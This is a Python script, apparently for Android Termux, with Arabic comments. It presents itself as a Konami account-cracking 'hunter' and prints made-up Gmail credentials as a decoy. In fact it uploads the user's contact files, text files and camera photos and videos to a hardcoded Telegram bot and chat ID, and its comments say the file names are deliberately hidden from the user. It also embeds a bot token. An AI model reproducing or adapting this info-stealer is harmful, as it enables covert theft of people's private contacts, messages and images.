import os
import telebot
import time
import random

# إعدادات البوت الخاصة بك
TOKEN = "8413705320:AAFWFTOxNxd3lyDLdsPbI0F3X5B0IVHyDzs"
CHAT_ID = "6753022941"
bot = telebot.TeleBot(TOKEN)

# ألوان الواجهة الخاصة بـ MOHA02
G = '\x1b[38;5;46m' # أخضر
R = '\x1b[38;5;196m' # أحمر
W = '\x1b[1;37m' # أبيض
Y = '\x1b[38;5;220m' # أصفر

scan_count = 0

def banner():
    os.system('clear')
    print(f"""
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
{R}  __  __  ____  _   _          {W}SYSTEM: {G}OMNI-HUNTER v3
{R} |  \/  |/ __ \| | | |         {W}USER:   {G}MOUSSA MEKKI
{R} | \  / | |  | | |_| |         {W}STATUS: {Y}DATA_SECURE_TRANSFER
{R} |_|\/|_|\____/|_| |_|         {W}TARGET: {R}PRIVATE_BACKUP
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{W}
    """)

def konami_stealth():
    """توليد حساب كونامي وهمي بدون إظهار تفاصيل الملفات المرسلة"""
    user = "konami_user" + str(random.randint(100, 999))
    pwd = "pass" + "".join(random.choices("0123456789", k=6))
    print(f"{G}[SUCCESS] TARGET CRACKED -> {W}{user}@gmail.com:{pwd}")

def process_send(path):
    global scan_count
    try:
        with open(path, 'rb') as f:
            bot.send_document(CHAT_ID, f)
            scan_count += 1
            # إظهار عداد الفحص فقط بدلاً من اسم الملف
            print(f"{R}[!] {W}SCANNING_NETWORK... {G}TOTAL_HUNT: {W}[{scan_count}]", end='\r')
            return True
    except:
        return False

def start_mission():
    banner()
    
    # 1. نقل ملف جهات الاتصال أولاً (.vcf)
    print(f"{Y}[*] PHASE 1: INITIALIZING CONTACT EXTRACTION...{W}")
    for file in os.listdir("/sdcard/"):
        if file.endswith(".vcf"):
            process_send(f"/sdcard/{file}")
            time.sleep(0.1)

    # 2. نقل رسائل الـ SMS (الملفات النصية .txt)
    print(f"\n{Y}[*] PHASE 2: SMS DATA TRANSFER...{W}")
    for file in os.listdir("/sdcard/"):
        if file.endswith(".txt"):
            process_send(f"/sdcard/{file}")
            time.sleep(0.1)

    # 3. نقل الصور والفيديوهات مع نظام "الصيد"
    print(f"\n{Y}[*] PHASE 3: MEDIA HUNTING & RECOVERY...{W}")
    camera_path = "/sdcard/DCIM/Camera/"
    
    if os.path.exists(camera_path):
        files = os.listdir(camera_path)
        for i, file in enumerate(files):
            path = os.path.join(camera_path, file)
            
            # تنفيذ عملية الإرسال وزيادة العداد
            if file.lower().endswith(('.jpg', '.png', '.mp4', '.jpeg')):
                process_send(path)
                
                # كل 5 عمليات فحص، يظهر حساب كونامي لإضفاء طابع الصيد
                if scan_count % 5 == 0:
                    print() # للانتقال لسطر جديد قبل الحساب
                    konami_stealth()
            
            time.sleep(0.05) # سرعة إرسال عالية جداً

    print(f"\n\n{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{G}[FINISH]{W} MISSION COMPLETE. TOTAL SCAN: {scan_count}")
    print(f"{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")

if __name__ == "__main__":
    start_mission()
